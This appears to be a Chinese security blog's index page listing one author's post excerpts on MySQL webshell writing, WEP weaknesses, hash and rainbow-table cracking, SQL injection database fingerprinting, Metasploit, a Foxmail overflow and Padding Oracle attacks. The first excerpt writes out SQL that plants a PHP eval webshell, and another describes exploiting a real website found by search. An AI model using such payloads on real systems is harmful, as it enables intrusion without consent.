原创 通過mysql寫入一句話***

作者 趙小布   use mysql; create table a (cmd text NOT NULL); insert into a (cmd) values(‘<?php eval($_POST[cmd];?>’); select

原创 IV和WEP

上次提到IV佔3個字節,是用來和密鑰組合成密鑰種子,作爲RC4算法的輸入,來產生加密字節流對數據進行加密的。每個數據幀都會有個IV(這個有待確認,我只抓到數據幀有IV)由於IV佔24位,所有再2的24次方後,IV就不可避免的產生了重複。 

原创 mysql root password hash crack

MYSQL HASH的加密方式共分爲兩種。MYSQL4.1之前的版本中,所用的加密方式爲MYSQL323,加密出來的HASH是16位的。MYSQL4.1包括之後的版本中,所用的加密方式爲MYSQLSHA1,加密出來的HASH是40位的。在M

原创 各種數據庫支持的註釋

作者 趙小布 Microsoft Access支持“null”和“%00”註釋; Microsoft SQL Server支持“--”和“;”註釋; MySQL支持“/*”註釋; Oracle支持“--”註釋;

原创 各種數據庫類型的判斷

作者 趙小布   select count(*) from sysobjects //Microsoft SQL Server數據庫的系統表,默認WEB環境下,用戶有訪問權限; select count(*) from msysobjec

原创 用彩虹表破解MD5、LM Hash等複雜加密密碼

一、什麼是彩虹表? 彩虹表(Rainbow Tables)就是一個龐大的、針對各種可能的字母組合預先計算好的哈希值的集合,不一定是針對MD5算法的,各種算法的都有,有了它可以快速的破解各類密碼。越是複雜的密碼,需要的彩虹表就越大,現在主流

原创 我的友情鏈接

51CTO博客開發AnyWlan

原创 MSF安裝失敗的原因

Rapid7公司的Meatasploit Exp版本可以下載使用了,上次下載了回來,license一直無法申請,後來給他們去了封郵件,馬上回了我,還附帶了license,想在自己的機器上安裝,一直無法成功,後來轉戰Ubuntu,順利安裝,東

原创 BackTrack4中文版自己做

已經把BackTrack 4安裝至硬盤,成功進入系統.磁盤有足夠的空間.有linux基礎. 接下來,開始製作屬於自己的中文ISO。 準備工作: 先創建一個叫work的工作目錄,然後把從官方下載回來的iso和定製BackTrack的腳本放到w

原创 Python學習筆記

最近學緩衝區溢出,同時又在學習Python,foxmail5有個溢出漏洞,書上給出的利用程序是用C語言寫的,代碼很長很複雜,決定用python改寫下,沒什麼技術含量,代碼還沒完全寫好,下面的只是發送郵件的功能。   #code by 趙小布

原创 Padding Oracle小試成功

 去年ASP.NET爆出了MS10-070漏洞,也就是俗稱的Padding Oracle,一直想找個網站試下,利用google搜索關鍵字WebResource.axd,找有此漏洞的網站,一直沒有成功,今天換了關鍵字,成功利用此漏洞!利用的是

原创 wifi下的cookies劫持

 很久以前的一篇文章了,wifi環境下實現了cookies劫持,挺有意思的。    

原创 How to Update to Metasploit 4 and use Autopwn in Backtrack 5

How to Update to Metasploit 4 and use Autopwn in Backtrack 5  Well, given the recent release of Backtrack 5, and

原创 淺析padding oracle

Padding Oracle Attack,被譽爲2010十大WEB***之首,但從字面上看,大家很容易誤解,其實和Oracle數據庫一點關係都沒有,這裏的Oracle是提示的意思,硬翻譯過來,就是填充提示***,產生這個問題的原因,推薦大

原创 我的友情鏈接

51CTO博客開發AnyWlan